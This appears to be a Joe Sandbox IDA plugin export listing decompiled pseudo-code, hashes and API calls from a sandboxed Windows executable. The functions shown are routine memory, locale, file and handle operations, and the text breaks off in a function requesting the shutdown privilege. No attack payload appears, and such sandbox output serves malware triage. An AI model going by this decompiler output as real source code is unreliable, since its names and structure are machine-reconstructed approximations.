Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: ErrorLast$FilePointer
String ID:
API String ID: 1156039329-0
Opcode ID: 538157e968a3ac5c726e5de151c37f75a3cb33a10b821e80b0acb50076539af1
Instruction ID: 35d6100753d45bb8327100f36a66a585210cd311ce16fd612f14262b47f048ad
Opcode Fuzzy Hash: 538157e968a3ac5c726e5de151c37f75a3cb33a10b821e80b0acb50076539af1
Instruction Fuzzy Hash: 9CE04FB1A002109FEB11EEB58881B6272D89F45364F0485BEF624DF2C6D274DC0087A5

Uniqueness

Uniqueness Score: -1.00%

Function 00401430 Relevance: 2.5, APIs: 2, Instructions: 37
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401430(void* __eax, void** __edx) {
				void* _t3;
				void** _t8;
				void* _t11;
				long _t14;

				_t8 = __edx;
				if(__eax >= 0x100000) {
					_t14 = __eax + 0x0000ffff & 0xffff0000;
				} else {
					_t14 = 0x100000;
				}
				_t8[1] = _t14;
				_t3 = VirtualAlloc(0, _t14, 0x2000, 1); // executed
				_t11 = _t3;
				 *_t8 = _t11;
				if(_t11 != 0) {
					_t3 = E004012E4(0x40b43c, _t8);
					if(_t3 == 0) {
						VirtualFree( *_t8, 0, 0x8000);
						 *_t8 = 0;
						return 0;
					}
				}
				return _t3;
			}

0x00401433
0x0040143d
0x0040144c
0x0040143f
0x0040143f
0x0040143f
0x00401452
0x0040145f
0x00401464
0x00401466
0x0040146a
0x00401473
0x0040147a
0x00401486
0x0040148d
0x00000000
0x0040148d
0x0040147a
0x00401492

APIs

VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,00401739), ref: 0040145F
VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,00401739), ref: 00401486

Memory Dump Source

Source File: 00000000.00000002.327320339.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.327314061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.327331214.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.327340443.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: 975b7fb2a686225bee9c52d91c62591a405f54c0ca2a93298412ee223aec9d09
Instruction ID: 0a9bdec6e0d4ada2bc80af5311ae0c0d9c5226b5e0cec20c8283fd4eb37d5a7f
Opcode Fuzzy Hash: 975b7fb2a686225bee9c52d91c62591a405f54c0ca2a93298412ee223aec9d09
Instruction Fuzzy Hash: 0FF02772B0032017DB20696A0CC1B536AC59F85B90F1540BBFA4CFF3FAD2B98C0042AD

Uniqueness

Uniqueness Score: -1.00%

Function 0040523C Relevance: 1.6, APIs: 1, Instructions: 99
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E0040523C(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				int _v12;
				char _v16;
				char _v20;
				void* _t76;
				void* _t77;
				intOrPtr _t103;
				void* _t106;
				void* _t107;
				void* _t109;
				void* _t110;
				void* _t113;

				_v16 = 0;
				_v20 = 0;
				_push(_t113);
				_push(0x405372);
				_push( *[fs:eax]);
				 *[fs:eax] = _t113 + 0xfffffff0;
				_v12 = GetSystemDefaultLCID();
				_t76 = 1;
				_t109 = 0x40b4bc;
				_t106 = 0x40b4ec;
				do {
					_t6 = _t76 + 0xffbf; // 0xffc0
					E00404C98(_t6,  &_v20);
					_t8 = _t76 + 0x44; // 0x45
					E004051C8(_v12, _v20, _t8 - 1,  &_v16); // executed
					E004031E8(_t109, _t76, _v16, _t106, _t109);
					_t13 = _t76 + 0xffcf; // 0xffd0
					E00404C98(_t13,  &_v20);
					_t15 = _t76 + 0x38; // 0x39
					E004051C8(_v12, _v20, _t15 - 1,  &_v16);
					E004031E8(_t106, _t76, _v16, _t106, _t109);
					_t76 = _t76 + 1;
					_t106 = _t106 + 4;
					_t109 = _t109 + 4;
				} while (_t76 != 0xd);
				_t77 = 1;
				_t110 = 0x40b51c;
				_t107 = 0x40b538;
				do {
					_t18 = _t77 + 5; // 0x6
					asm("cdq");
					_v8 = _t18 % 7;
					_t26 = _t77 + 0xffdf; // 0xffe0
					E00404C98(_t26,  &_v20);
					E004051C8(_v12, _v20, _v8 + 0x31,  &_v16);
					E004031E8(_t110, _t77, _v16, _t107, _t110);
					_t33 = _t77 + 0xffe6; // 0xffe7
					E00404C98(_t33,  &_v20);
					E004051C8(_v12, _v20, _v8 + 0x2a,  &_v16);
					E004031E8(_t107, _t77, _v16, _t107, _t110);
					_t77 = _t77 + 1;
					_t107 = _t107 + 4;
					_t110 = _t110 + 4;
				} while (_t77 != 8);
				_pop(_t103);
				 *[fs:eax] = _t103;
				_push(E00405379);
				return E004031B8( &_v20, 2);
			}

0x00405247
0x0040524a
0x0040524f
0x00405250
0x00405255
0x00405258
0x00405260
0x00405263
0x00405268
0x0040526d
0x00405272
0x00405279
0x0040527f
0x00405287
0x0040528e
0x00405298
0x004052a4
0x004052aa
0x004052b2
0x004052b9
0x004052c3
0x004052c8
0x004052c9
0x004052cc
0x004052cf
0x004052d4
0x004052d9
0x004052de
0x004052e3
0x004052e3
0x004052eb
0x004052ee
0x004052f8
0x004052fe
0x0040530f
0x00405319
0x00405325
0x0040532b
0x0040533c
0x00405346
0x0040534b
0x0040534c
0x0040534f
0x00405352
0x00405359
0x0040535c
0x0040535f
0x00405371

APIs

GetSystemDefaultLCID.KERNEL32(00000000,00405372), ref: 0040525B

Part of subcall function 00404C98: LoadStringA.USER32 ref: 00404CB5

Part of subcall function 004051C8: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040B4BC,00000001,?,00405293,?,00000000,00405372), ref: 004051E6

Memory Dump Source

Source File: 00000000.00000002.327320339.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.327314061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.327331214.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.327340443.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: DefaultInfoLoadLocaleStringSystem
String ID:
API String ID: 1658689577-0
Opcode ID: aee2922704152e08845fe9bf4c35c11f409648bc30f3b488164af542f932a8fc
Instruction ID: 90d117b69a0baa23d00b853d448e1049b7d79c9d49ac5036288f6274aab8556b
Opcode Fuzzy Hash: aee2922704152e08845fe9bf4c35c11f409648bc30f3b488164af542f932a8fc
Instruction Fuzzy Hash: 93316D75E00109ABCB00EF95CCC09EEB779EF85304F518977E815BB285E739AE018B98

Uniqueness

Uniqueness Score: -1.00%

Function 00407110 Relevance: 1.6, APIs: 1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 40%

			E00407110(void* __ecx, void* __edx, void* _a4, void* _a8, void* _a12) {
				void* __ebp;
				intOrPtr* _t13;
				intOrPtr _t26;
				intOrPtr _t27;
				void* _t32;
				void* _t33;
				void* _t34;
				intOrPtr* _t36;
				void* _t38;
				void* _t39;

				_t34 = __edx;
				_t33 = __ecx;
				if(__edx != 0) {
					_t39 = _t39 + 0xfffffff0;
					_t13 = E00402AC8(_t13, _t38);
				}
				_t32 = _t34;
				_t36 = _t13;
				E004028FC(0);
				_push(0);
				_push(0x80);
				_push( *0x0040A174);
				_push(0);
				_push( *0x0040A164);
				_push( *0x0040A158);
				_t26 = E004034B8(_t33);
				_push(_t26); // executed
				L00404478(); // executed
				 *((intOrPtr*)(_t36 + 4)) = _t26;
				_t11 = _t36 + 4; // 0x69465405
				_t27 =  *_t11;
				if(_t27 == 0 || _t27 + 1 == 0) {
					E004072D8( *_t36);
				}
				 *((char*)(_t36 + 8)) = 1;
				if(_t32 != 0) {
					_pop( *[fs:0x0]);
				}
				return _t36;
			}

0x00407110
0x00407110
0x00407118
0x0040711a
0x0040711d
0x0040711d
0x00407124
0x00407126
0x0040712c
0x00407131
0x00407133
0x00407144
0x00407145
0x00407153
0x00407160
0x00407163
0x00407168
0x00407169
0x0040716e
0x00407171
0x00407171
0x00407176
0x0040717d
0x0040717d
0x00407182
0x00407188
0x0040718a
0x00407191
0x0040719a

APIs

6D2B5CA0.KERNEL32(00000000,?,?,00000000,?,00000080,00000000,?,0040BDE0,?,?,0040971A,00000001,00000000,00000002,00000000), ref: 00407169

Memory Dump Source

Source File: 00000000.00000002.327320339.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.327314061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.327331214.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.327340443.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a4953a0f0ff7f2b412f37018494effe7ee8a3f526b72d8dc06175a4c3b7e005
Instruction ID: 5f9499a452b8e7bb7806c2f972eba8b44647bac607cd572223cd82b18298d25b
Opcode Fuzzy Hash: 2a4953a0f0ff7f2b412f37018494effe7ee8a3f526b72d8dc06175a4c3b7e005
Instruction Fuzzy Hash: BD01F5B17042446BD310EB7D9D41B5B7B98AB45354F088136F898EB3C1DA39E92187A9

Uniqueness

Uniqueness Score: -1.00%

Function 004067C8 Relevance: 1.5, APIs: 1, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004067C8(char* __eax, void* __ecx, void* __edx, void* __eflags) {
				char* _t14;
				void* _t16;
				void* _t18;
				void* _t25;
				char* _t26;
				void* _t27;

				_t27 = __edx;
				_t26 = __eax;
				_t25 = E00406674(__eax, __ecx, 1);
				_t18 = E004032F4(_t26);
				while(_t25 < _t18) {
					_t14 = CharPrevA(_t26,  &(_t26[_t18])); // executed
					_t16 =  *_t14 - 0x2f;
					if(_t16 == 0 || _t16 == 0x2d) {
						_t18 = _t18 - 1;
						continue;
					} else {
						break;
					}
				}
				if(_t18 != E004032F4(_t26)) {
					return E004034F8(_t26, _t18, 1, _t27);
				}
				return E0040322C(_t27, _t26);
			}

0x004067cc
0x004067ce
0x004067d9
0x004067e2
0x004067e7
0x004067f0
0x004067f7
0x004067f9
0x004067e6
0x00000000
0x00000000
0x00000000
0x00000000
0x004067f9
0x00406808
0x00000000
0x0040681f
0x00000000

APIs

CharPrevA.USER32(00000000,00000000,?,?,?,00000000,0040684E,00000000,00406874,?,?,?,?,00000000,?,00406889), ref: 004067F0

Memory Dump Source

Source File: 00000000.00000002.327320339.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.327314061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.327331214.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.327340443.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: CharPrev
String ID:
API String ID: 122130370-0
Opcode ID: 132315b3f1f0174c6f40125720e517ec2b51761c1b394f30385f713dfeb2f7ab
Instruction ID: 3fbd39d5db77d5cc682696ff9061fa83ae4b719539a7415b69a8094445fc1756
Opcode Fuzzy Hash: 132315b3f1f0174c6f40125720e517ec2b51761c1b394f30385f713dfeb2f7ab
Instruction Fuzzy Hash: D6F0FA613008241BC6117A7E18818AFA6CC8B8A74C741403BF002EB282EE3DAE1752AE

Uniqueness

Uniqueness Score: -1.00%

Function 0040682C Relevance: 1.5, APIs: 1, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 27%

			E0040682C(char* __eax, void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				char _v8;
				intOrPtr _t20;
				intOrPtr _t25;

				_push(0);
				_push(_t25);
				_push(0x406874);
				_push( *[fs:eax]);
				 *[fs:eax] = _t25;
				E004067C8(__eax, __ecx,  &_v8, __eflags);
				_push(E004034B8(_v8)); // executed
				L004044C0(); // executed
				_pop(_t20);
				 *[fs:eax] = _t20;
				_push(E0040687B);
				return E00403198( &_v8);
			}

0x0040682f
0x00406838
0x00406839
0x0040683e
0x00406841
0x00406849
0x00406856
0x00406857
0x00406860
0x00406863
0x00406866
0x00406873

APIs

Part of subcall function 004067C8: CharPrevA.USER32(00000000,00000000,?,?,?,00000000,0040684E,00000000,00406874,?,?,?,?,00000000,?,00406889), ref: 004067F0

6D7478A0.KERNEL32(00000000,00000000,00406874,?,?,?,?,00000000,?,00406889,00406BC3,00000000,00406C08,?,?,?), ref: 00406857

Memory Dump Source

Source File: 00000000.00000002.327320339.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.327314061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.327331214.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.327340443.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: CharD7478Prev
String ID:
API String ID: 2808809543-0
Opcode ID: 2c5a75b2c1a8baf53c4d1bf21335fab3318964c02dec770839463c01c23d9986
Instruction ID: c5669f274b4e49bfd56b19cd61ad569b0a255c4f164afe14bd72cf1ed24d0fa9
Opcode Fuzzy Hash: 2c5a75b2c1a8baf53c4d1bf21335fab3318964c02dec770839463c01c23d9986
Instruction Fuzzy Hash: FCE06531204304BBD701FE629C52D5ABBECD749718B92487AB501B7581D5789E148568

Uniqueness

Uniqueness Score: -1.00%

Function 004073C8 Relevance: 1.5, APIs: 1, Instructions: 29
fileCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E004073C8(intOrPtr* __eax, long __ecx, void* __edx, void* __ebp) {
				long _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				int _t6;
				intOrPtr* _t9;
				long _t15;

				_push(__ecx);
				_t15 = __ecx;
				_t14 = __edx;
				_t9 = __eax;
				_t6 = WriteFile( *(__eax + 4), __edx, __ecx,  &_v16, 0); // executed
				if(_t6 == 0) {
					_t6 = E004072D8( *_t9);
				}
				if(_t15 != _v16) {
					_t6 = E00407238(_t9, 0x1d, _t14, _t15);
				}
				return _t6;
			}

0x004073cb
0x004073cc
0x004073ce
0x004073d0
0x004073df
0x004073e6
0x004073ea
0x004073ea
0x004073f2
0x004073fb
0x004073fb
0x00407404

APIs

WriteFile.KERNEL32(?,020B8000,000A0E00,?,00000000,000A0E00,?,?,020B8000,00409B3A), ref: 004073DF

Part of subcall function 004072D8: GetLastError.KERNEL32(00000001,00407182,00000000,?,?,00000000,?,00000080,00000000,?,0040BDE0,?,?,0040971A,00000001,00000000), ref: 004072DB

Memory Dump Source

Source File: 00000000.00000002.327320339.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.327314061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.327331214.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.327340443.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID:
API String ID: 442123175-0
Opcode ID: 78abb394caad9e94f4f5e9b378634bba7cacbecfd8e2944ecd8de2acb781cba0
Instruction ID: 0c4fc9c00003d1daa9aab464f2216e702ea3a4b946e36cb3e45b94fb3def9b8d
Opcode Fuzzy Hash: 78abb394caad9e94f4f5e9b378634bba7cacbecfd8e2944ecd8de2acb781cba0
Instruction Fuzzy Hash: 70E09A727081106BEB10E65AD880EABA7DCCFC5364F00407BFA08EB281E674AC0487B6

Uniqueness

Uniqueness Score: -1.00%

Function 004073AC Relevance: 1.5, APIs: 1, Instructions: 11
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004073AC(intOrPtr* __eax) {
				int _t4;
				intOrPtr* _t7;

				_t7 = __eax;
				_t4 = SetEndOfFile( *(__eax + 4)); // executed
				if(_t4 == 0) {
					return E004072D8( *_t7);
				}
				return _t4;
			}

0x004073ad
0x004073b3
0x004073ba
0x00000000
0x004073be
0x004073c4

APIs

SetEndOfFile.KERNEL32(?,020B8000,00409B1C), ref: 004073B3

Part of subcall function 004072D8: GetLastError.KERNEL32(00000001,00407182,00000000,?,?,00000000,?,00000080,00000000,?,0040BDE0,?,?,0040971A,00000001,00000000), ref: 004072DB

Memory Dump Source

Source File: 00000000.00000002.327320339.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.327314061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.327331214.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.327340443.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: ErrorFileLast
String ID:
API String ID: 734332943-0
Opcode ID: 381ebf295b1be6250c99f6c70e51889136dfee5781ea7fa6af6b712eafc4e77e
Instruction ID: 440db3fb54f29f57427f4d8a1e0ae65b4843bfcf82987af21eef9c9bff427b07
Opcode Fuzzy Hash: 381ebf295b1be6250c99f6c70e51889136dfee5781ea7fa6af6b712eafc4e77e
Instruction Fuzzy Hash: B0C04CA1A0411057DB00A6AA99C1A0666DC5A4821835084B6BF04DF286E678EC105716

Uniqueness

Uniqueness Score: -1.00%

Function 004015C4 Relevance: 1.3, APIs: 1, Instructions: 54
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004015C4(signed int __eax, void** __ecx, intOrPtr __edx) {
				signed int _v20;
				void** _v24;
				void* _t15;
				void** _t16;
				void* _t17;
				signed int _t27;
				intOrPtr* _t29;
				void* _t31;
				intOrPtr* _t32;

				_v24 = __ecx;
				 *_t32 = __edx;
				_t31 = __eax & 0xfffff000;
				_v20 = __eax +  *_t32 + 0x00000fff & 0xfffff000;
				 *_v24 = _t31;
				_t15 = _v20 - _t31;
				_v24[1] = _t15;
				_t29 =  *0x40b43c; // 0x40b43c
				while(_t29 != 0x40b43c) {
					_t7 = _t29 + 8; // 0x0
					_t17 =  *_t7;
					_t8 = _t29 + 0xc; // 0x0
					_t27 =  *_t8 + _t17;
					if(_t31 > _t17) {
						_t17 = _t31;
					}
					if(_t27 > _v20) {
						_t27 = _v20;
					}
					if(_t27 > _t17) {
						_t15 = VirtualAlloc(_t17, _t27 - _t17, 0x1000, 4); // executed
						if(_t15 == 0) {
							_t16 = _v24;
							 *_t16 = 0;
							return _t16;
						}
					}
					_t29 =  *_t29;
				}
				return _t15;
			}

0x004015cb
0x004015cf
0x004015d6
0x004015eb
0x004015f3
0x004015f9
0x004015ff
0x00401602
0x00401646
0x0040160a
0x0040160a
0x0040160d
0x00401610
0x00401614
0x00401616
0x00401616
0x0040161c
0x0040161e
0x0040161e
0x00401624
0x00401631
0x00401638
0x0040163a
0x00401640
0x00000000
0x00401640
0x00401638
0x00401644
0x00401644
0x00401655

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00401631

Memory Dump Source

Source File: 00000000.00000002.327320339.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.327314061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.327331214.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.327340443.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: cc502ff02348c5ca14464282c50bf6d9044616516d427296b297e1b86820bb76
Instruction ID: 8a4128db402ff564317842b1528136efc943efb3ec0006f7d13b38747f41841c
Opcode Fuzzy Hash: cc502ff02348c5ca14464282c50bf6d9044616516d427296b297e1b86820bb76
Instruction Fuzzy Hash: 41113CB2A057019FC3109F29CD80A1BB7E5EBC4760F19C93DE598A73A5D736AC408699

Uniqueness

Uniqueness Score: -1.00%

Function 00401658 Relevance: 1.3, APIs: 1, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00401658(void* __eax, void** __ecx, void* __edx) {
				int _t7;
				void* _t9;
				signed int _t14;
				intOrPtr* _t19;
				signed int _t22;
				void** _t23;

				_push(__ecx);
				 *_t23 = __eax + 0x00000fff & 0xfffff000;
				_t22 = __eax + __edx & 0xfffff000;
				 *__ecx =  *_t23;
				_t7 = _t22 -  *_t23;
				__ecx[1] = _t7;
				_t19 =  *0x40b43c; // 0x40b43c
				while(_t19 != 0x40b43c) {
					_t2 = _t19 + 8; // 0x0
					_t9 =  *_t2;
					_t3 = _t19 + 0xc; // 0x0
					_t14 =  *_t3 + _t9;
					if(_t9 <  *_t23) {
						_t9 =  *_t23;
					}
					if(_t22 < _t14) {
						_t14 = _t22;
					}
					if(_t14 > _t9) {
						_t7 = VirtualFree(_t9, _t14 - _t9, 0x4000); // executed
						if(_t7 == 0) {
							 *0x40b418 = 2;
						}
					}
					_t19 =  *_t19;
				}
				return _t7;
			}

0x0040165c
0x0040166d
0x00401674
0x0040167d
0x00401681
0x00401684
0x00401687
0x004016c7
0x0040168f
0x0040168f
0x00401692
0x00401695
0x0040169a
0x0040169c
0x0040169c
0x004016a1
0x004016a3
0x004016a3
0x004016a7
0x004016b2
0x004016b9
0x004016bb
0x004016bb
0x004016b9
0x004016c5
0x004016c5
0x004016d4

APIs

VirtualFree.KERNEL32(00000000,00000000,00004000,?,?,?,?,?,004018BF), ref: 004016B2

Memory Dump Source

Source File: 00000000.00000002.327320339.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.327314061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.327331214.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.327340443.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: cb90924cff6733cc6eacdcc881367b727e1878aa05a1c28612b22713fd768cab
Instruction ID: 16a4501794763894d112e8f61db517d820fca643a48b443a7e05d48f47cfc21a
Opcode Fuzzy Hash: cb90924cff6733cc6eacdcc881367b727e1878aa05a1c28612b22713fd768cab
Instruction Fuzzy Hash: B501A7726443144BC310AF28DDC092A77D5DB85364F19497ED985B73A2D33B6C0587EC

Uniqueness

Uniqueness Score: -1.00%

Function 0040128C Relevance: 1.3, APIs: 1, Instructions: 34
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040128C() {
				intOrPtr* _t4;
				void* _t5;
				void _t6;
				intOrPtr* _t9;
				void* _t12;
				void* _t14;

				if( *0x40b438 != 0) {
					L5:
					_t4 =  *0x40b438;
					 *0x40b438 =  *_t4;
					return _t4;
				} else {
					_t5 = LocalAlloc(0, 0x644); // executed
					_t12 = _t5;
					if(_t12 != 0) {
						_t6 =  *0x40b434; // 0x0
						 *_t12 = _t6;
						 *0x40b434 = _t12;
						_t14 = 0;
						do {
							_t2 = (_t14 + _t14) * 8; // 0x4
							_t9 = _t12 + _t2 + 4;
							 *_t9 =  *0x40b438;
							 *0x40b438 = _t9;
							_t14 = _t14 + 1;
						} while (_t14 != 0x64);
						goto L5;
					} else {
						return 0;
					}
				}
			}

0x00401296
0x004012d2
0x004012d2
0x004012d6
0x004012da
0x00401298
0x0040129f
0x004012a4
0x004012a8
0x004012af
0x004012b4
0x004012b6
0x004012bc
0x004012be
0x004012c2
0x004012c2
0x004012c8
0x004012ca
0x004012cc
0x004012cd
0x00000000
0x004012aa
0x004012ae
0x004012ae
0x004012a8

APIs

LocalAlloc.KERNEL32(00000000,00000644,?,0040B44C,004012EF,?,?,0040138F,?,?,?,?,?,004018CF), ref: 0040129F

Memory Dump Source

Source File: 00000000.00000002.327320339.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.327314061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.327331214.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.327340443.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: AllocLocal
String ID:
API String ID: 3494564517-0
Opcode ID: d0098a64720638dd74679531885fee3c7462df8ca2e6a3b92f5e623581651788
Instruction ID: 315ca4eb5df40ff61ed7d7a3f3733bbcaf0eb1fae048c0f6dcbee72b686809ba
Opcode Fuzzy Hash: d0098a64720638dd74679531885fee3c7462df8ca2e6a3b92f5e623581651788
Instruction Fuzzy Hash: C2F08C757023018FD724CF69D980AA6B3E5EBA9315F6480BEE184F73A1D3398C018B98

Uniqueness

Uniqueness Score: -1.00%

Function 004071A0 Relevance: 1.3, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004071A0(void* __eax, void* __edx) {
				void* _t11;
				void* _t14;

				_t11 = __edx;
				_t14 = __eax;
				if( *((char*)(__eax + 8)) != 0) {
					CloseHandle( *(__eax + 4)); // executed
				}
				E00402918(0);
				if(_t11 != 0) {
					E00402B04(_t14);
				}
				return _t14;
			}

0x004071a2
0x004071a4
0x004071aa
0x004071b0
0x004071b0
0x004071b9
0x004071c0
0x004071c4
0x004071c4
0x004071cd

APIs

CloseHandle.KERNEL32(?), ref: 004071B0

Memory Dump Source

Source File: 00000000.00000002.327320339.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.327314061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.327331214.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.327340443.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 64faf51ca776932e32294bd7d298a65174b584c2d71aafb8e004403781b10225
Instruction ID: eb663c3049cd41eaed7f8da649869d3065555633a8784fa47651b72bf01304ad
Opcode Fuzzy Hash: 64faf51ca776932e32294bd7d298a65174b584c2d71aafb8e004403781b10225
Instruction Fuzzy Hash: EFD05E91B01A6006E215F6BF4D8864692C94F88645B08843BF644EB3D1D67CAD009399

Uniqueness

Uniqueness Score: -1.00%

Function 00407B0C Relevance: 1.3, APIs: 1, Instructions: 17
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00407B0C(void* __eax) {
				void* _t8;
				void* _t11;

				_t11 = __eax;
				 *((intOrPtr*)(__eax + 0x18)) = 0;
				 *((intOrPtr*)(__eax + 0x20)) = 0;
				_t8 =  *(__eax + 0x1c);
				if(_t8 != 0) {
					VirtualFree(_t8, 0, 0x8000); // executed
					 *((intOrPtr*)(_t11 + 0x1c)) = 0;
					return 0;
				}
				return _t8;
			}

0x00407b0d
0x00407b11
0x00407b16
0x00407b19
0x00407b1e
0x00407b28
0x00407b2f
0x00000000
0x00407b2f
0x00407b33

APIs

VirtualFree.KERNEL32(?,00000000,00008000,?,00407C49), ref: 00407B28

Memory Dump Source

Source File: 00000000.00000002.327320339.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.327314061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.327331214.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.327340443.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 9484b68ed88a4bcab3c5cd67a286607994066138370248db870f16f1437fe28e
Instruction ID: 7b5879f7ecf15af23bee615e1cfb1b7bf134d3467332cfcfa004d2a9f5112783
Opcode Fuzzy Hash: 9484b68ed88a4bcab3c5cd67a286607994066138370248db870f16f1437fe28e
Instruction Fuzzy Hash: 3DD09EB17502005FDBD4DF794CC1B0336D47B48700B6184766908DB286E674D5108B54

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00408F74 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E00408F74() {
				intOrPtr _v4;
				struct _TOKEN_PRIVILEGES _v16;
				void* _v20;
				long _t6;

				if( *0x40a07c == 2) {
					if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v20) == 0) {
						return E00408F54();
					}
					LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v16.Privileges));
